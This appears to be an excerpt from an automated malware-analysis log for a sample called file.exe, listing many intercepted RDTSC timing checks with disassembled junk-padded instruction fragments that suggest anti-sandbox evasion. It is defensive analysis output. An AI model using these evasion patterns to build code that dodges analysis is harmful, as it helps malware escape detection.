    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954209 second address: 954212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9736F1 second address: 9736F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9736F5 second address: 973710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDDACF47FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jnl 00007FDDACF47FD6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973710 second address: 973723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716BE second address: 9716C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716C4 second address: 9716CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716CA second address: 9716CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716CE second address: 9716D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716D4 second address: 9716DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9716DD second address: 9716EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97180D second address: 971811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9719B4 second address: 9719C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDDACAD5286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971AF0 second address: 971B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDDACF47FD6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b js 00007FDDACF47FD6h 0x00000011 popad 0x00000012 pushad 0x00000013 jl 00007FDDACF47FD6h 0x00000019 jmp 00007FDDACF47FDEh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971DAE second address: 971DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971DB8 second address: 971DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97208D second address: 972093 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972229 second address: 97223D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FDDACF47FDEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97223D second address: 972241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9723BD second address: 9723C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9723C2 second address: 9723C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9723C8 second address: 9723CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97251C second address: 97252A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97252A second address: 97252E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97252E second address: 972534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97267E second address: 972684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972684 second address: 972688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972688 second address: 97268C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967B15 second address: 967B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967B19 second address: 967B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967B1D second address: 967B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943F77 second address: 943F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9727DF second address: 9727FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDDACAD5286h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FDDACAD528Ch 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9727FA second address: 972838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDDACF47FD6h 0x00000009 jns 00007FDDACF47FD6h 0x0000000f jnl 00007FDDACF47FD6h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FDDACF47FE3h 0x0000001c jng 00007FDDACF47FD6h 0x00000022 popad 0x00000023 pop edx 0x00000024 pop eax 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a jnp 00007FDDACF47FD6h 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972838 second address: 97284D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5291h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972DC1 second address: 972DCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972DCD second address: 972DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9730CC second address: 9730D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9730D0 second address: 9730EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDDACAD5292h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973239 second address: 97324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FDDACF47FD6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97324B second address: 973251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973251 second address: 973271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FDDACF47FF9h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACF47FE1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973271 second address: 973275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973275 second address: 973279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97357A second address: 973580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976A41 second address: 976A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FDDACF47FD6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976AE1 second address: 976AEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976AEB second address: 976AFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FDDACF47FE4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976AFE second address: 976B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C6E3 second address: 97C707 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FDDACF47FE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9474CE second address: 9474D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9474D2 second address: 9474FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDDACF47FDBh 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDDACF47FE6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EEF2 second address: 97EF06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnp 00007FDDACAD5286h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FDDACAD5286h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EF06 second address: 97EF0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F061 second address: 97F065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F065 second address: 97F070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F070 second address: 97F083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FDDACAD5286h 0x0000000d jo 00007FDDACAD5286h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F641 second address: 97F647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F647 second address: 97F64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7BE second address: 97F7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7C6 second address: 97F7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7CC second address: 97F7ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDDACF47FE8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7ED second address: 97F7F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F94B second address: 97F94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F94F second address: 97F955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843AE second address: 9843B8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDDACF47FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843B8 second address: 9843DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007FDDACAD5291h 0x0000000d jmp 00007FDDACAD528Bh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843DA second address: 9843E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843E1 second address: 98441F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FDDACAD5292h 0x0000000f jne 00007FDDACAD528Ch 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDDACAD528Fh 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98441F second address: 98445A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDDACF47FD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov esi, edi 0x0000000f jmp 00007FDDACF47FE9h 0x00000014 call 00007FDDACF47FD9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FDDACF47FD6h 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98445A second address: 984464 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984464 second address: 984490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jg 00007FDDACF47FD6h 0x00000013 jmp 00007FDDACF47FE3h 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984490 second address: 98449A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850CA second address: 9850D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850D0 second address: 9850D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850D6 second address: 9850DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850DA second address: 9850DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98544F second address: 985468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986507 second address: 98650E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98650E second address: 9865B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDDACF47FDBh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FDDACF47FD8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FDDACF47FD8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D2A7Eh] 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007FDDACF47FD8h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 00000019h 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 movzx esi, si 0x0000006b movzx esi, dx 0x0000006e xchg eax, ebx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FDDACF47FE6h 0x00000076 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9865B9 second address: 9865E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACAD528Fh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98763A second address: 9876D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDDACF47FE9h 0x0000000e nop 0x0000000f movzx esi, bx 0x00000012 push 00000000h 0x00000014 mov di, FBF2h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FDDACF47FD8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 jmp 00007FDDACF47FE6h 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b jmp 00007FDDACF47FE5h 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FDDACF47FE7h 0x00000047 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E0D second address: 986E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9876D2 second address: 9876D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E12 second address: 986E24 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDACAD5288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9876D6 second address: 9876E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 js 00007FDDACF47FDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E24 second address: 986E32 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E32 second address: 986E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E36 second address: 986E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988298 second address: 98829E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A33E second address: 98A36A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FDDACAD5298h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FDDACAD5286h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A422 second address: 98A429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A429 second address: 98A449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007FDDACAD5292h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A449 second address: 98A44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EDFC second address: 98EE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDDACAD5286h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
